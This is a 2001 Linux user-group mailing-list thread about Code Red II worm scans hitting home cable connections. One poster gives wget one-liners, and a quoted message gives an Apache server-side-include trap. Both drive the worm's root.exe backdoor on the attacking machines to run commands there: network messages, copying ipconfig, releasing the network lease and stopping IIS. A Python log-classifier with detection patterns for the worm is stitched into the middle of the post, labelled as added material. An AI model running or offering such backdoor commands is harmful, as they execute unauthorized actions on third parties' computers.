[NTLUG:Discuss] @home, Carrollton TX hits on port 80

Jack Snodgrass idiotboy at cybermail.net
Sat Aug 11 09:21:06 CDT 2001


I don't think that this will work.

I tried it, but lynx called from apache has problems.
It complains that there is no terminal associated with the lynx process.

I'm using wget -o /dev/null now instead. It might work... but might not.

I tried to access several servers that tried to infect my server but they
were all busy. None of them were accepting connections. In order for this
to work, they would have to accept the connection and run the root.exe.

I also used:

/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?\
/c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+\
Red+II+worm+and+attacked+my+server"

/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?\
/c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+\
and+fix+this+server+ASAP."

/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?\
/c+explorer+http://www.myservername.net/code_red_worm.html"

/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?\
/c+copy+c:\winnt\system32\ipconfig.exe+."

/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/ipconfig.exe?+\
/release"

( I added the line breaks, with a trailing backslash so the shell joins
them back into one line ) and so far, no boxes have tried to access my
http://www.myservername.net/code_red_worm.html page. Either I'm doing
something wrong... or I think.... the servers just don't respond to the
messages now.

I guess I could try and run this later when they are less busy infecting
other machines.


jack
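As an added example (not code from this thread or from any of its posters), here is a small Python filter that runs over Apache access-log lines and sorts the worm traffic the thread describes into the original Code Red (a long run of "N" in the /default.ida request), Code Red II (a run of "X"), and follow-up requests for the root.exe backdoor that Code Red II leaves in the scripts and MSADC directories (CERT CA-2001-23), which is what the wget one-liners above depend on. The log format assumed is Apache "common" format; the sample lines, the IP addresses, the shortened shellcode tail and the 20-repeat threshold are constructed for illustration and are not from the original post or from any real capture.

```python
import re
from collections import Counter, defaultdict

# Apache "common" log format: ip ident user [date] "METHOD URI PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Both worms hit /default.ida (the Index Server ISAPI filter) with a long filler
# run followed by %u-encoded shellcode. The filler byte is the tell the thread
# points out: 'N' for the original Code Red, 'X' for Code Red II. The minimum of
# 20 repeats is an assumption made for this example, not something from a spec.
IDA_RE = re.compile(r'^/default\.ida\?([NX])\1{19,}')

# Code Red II copies cmd.exe to root.exe in the scripts and MSADC directories
# (CERT CA-2001-23). A request for it is someone driving that backdoor.
BACKDOOR_RE = re.compile(r'^/(scripts|msadc)/root\.exe(\?|$)', re.IGNORECASE)


def classify(uri):
    """Return a label for a worm-related request URI, or None for anything else."""
    m = IDA_RE.match(uri)
    if m:
        return 'codered-ii-probe' if m.group(1) == 'X' else 'codered-i-probe'
    if BACKDOOR_RE.match(uri):
        return 'codered-ii-backdoor'
    return None


def summarize(log_text):
    """Count worm hits overall and per source IP; non-matching lines are skipped."""
    by_kind = Counter()
    by_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in common log format; ignore rather than crash
        kind = classify(m.group('uri'))
        if kind:
            by_kind[kind] += 1
            by_ip[m.group('ip')][kind] += 1
    return by_kind, dict(by_ip)


def _line(ip, ts, uri, status):
    # Helper to build constructed sample entries in common log format.
    return f'{ip} - - [{ts}] "GET {uri} HTTP/1.0" {status} 284'


# Constructed sample log (documentation IP ranges, shortened shellcode tail).
_TAIL = '%u9090%u6858%ucbd3%u7801%u9090=a'
SAMPLE_LOG = "\n".join([
    _line('198.51.100.7', '11/Aug/2001:09:01:12 -0500', '/default.ida?' + 'X' * 224 + _TAIL, 404),
    _line('198.51.100.23', '11/Aug/2001:09:04:51 -0500', '/default.ida?' + 'X' * 224 + _TAIL, 404),
    _line('203.0.113.9', '11/Aug/2001:09:07:30 -0500', '/default.ida?' + 'N' * 224 + _TAIL, 404),
    _line('198.51.100.7', '11/Aug/2001:09:09:02 -0500', '/scripts/root.exe?/c+dir', 404),
    _line('192.0.2.44', '11/Aug/2001:09:10:15 -0500', '/index.html', 200),
    'this line is not in log format and is skipped',
])


if __name__ == '__main__':
    kinds, ips = summarize(SAMPLE_LOG)
    for kind, n in sorted(kinds.items()):
        print(f'{kind:22s} {n}')
    for ip, c in sorted(ips.items()):
        print(ip, dict(c))
```

Feed it a real access_log with `summarize(open('/var/log/apache/access_log').read())`; a host that shows up under both the probe and the backdoor label is one where the worm's payload succeeded rather than just scanned.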



----- Original Message -----
From: "Michael Collins" <mhtexcollins at austin.rr.com>
To: <discuss at ntlug.org>
Sent: Friday, August 10, 2001 9:20 PM
Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80


> Saw this on alt.os.linux.slackware...thought you guys might be interested.
>
> Open httpd.conf and add:
> AddType text/html .ida
> AddHandler server-parsed .ida
>
> Restart apache with
> /var/lib/apache/sbin/apachectl restart
>
> Create the file /var/lib/apache/htdocs/default.ida with the following
> line:
> <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
>
> Then sit back and watch the bastard machines shut themselves down.
>
> Note: This will not work on the original Code Red. That's the one that
> displays a string of "N" characters instead of "X" characters.
>
> J. Jentink wrote:
> > I am getting about 20 hits an hour right now over my @home cable in
> > Carrollton.
> > From my web log, the following are the last few hitters: IP and
> > reverse DNS lookup
> >   24.0.40.151 cx1221131-b.elcjn1.sdca.home.com
> >   24.0.164.239 cx586708-a.fed1.sdca.home.com
> >   24.0.218.136 cx59931-a.dnpt1.occa.home.com
> >   24.0.162.42 cx487547-a.fed1.sdca.home.com
> >   24.0.154.161 cx112244-c.cv1.sdca.home.com
> >   24.0.162.42 cx487547-a.fed1.sdca.home.com
> >   24.0.212.47 cx47296-a.alsv1.occa.home.com
> >   24.0.147.21 cx512128-c.dt1.sdca.home.com
> >   24.0.235.235 c1517939-b.frndl1.wa.home.com
> >   24.0.49.245 c75556-f.potlnd1.or.home.com
> >
> > When I did the reverse DNS on my own IP, it maps to the form..
> >     c*******-a.croltn1.tx.home.com
> > Looks like I am getting hammered by the @home folks on the west
> > coast... California, Washington and Oregon.
> >
> > My RD light on the cable modem also blinks constantly. I just
> > disconnect it when I am not using the internet. What fun.
> >
> > j.
> >
> >
> >
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
> >
>
>
>
> --
> --
> Michael H. Collins              Admiral: Penguinista Navy International
> http://www.linuxlink.com        Migration
> Free Linux Email                http://www.78704.com
> A great geek girl mp3           http://24.28.86.53
> This Ain't California http://geekaustin.com/
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
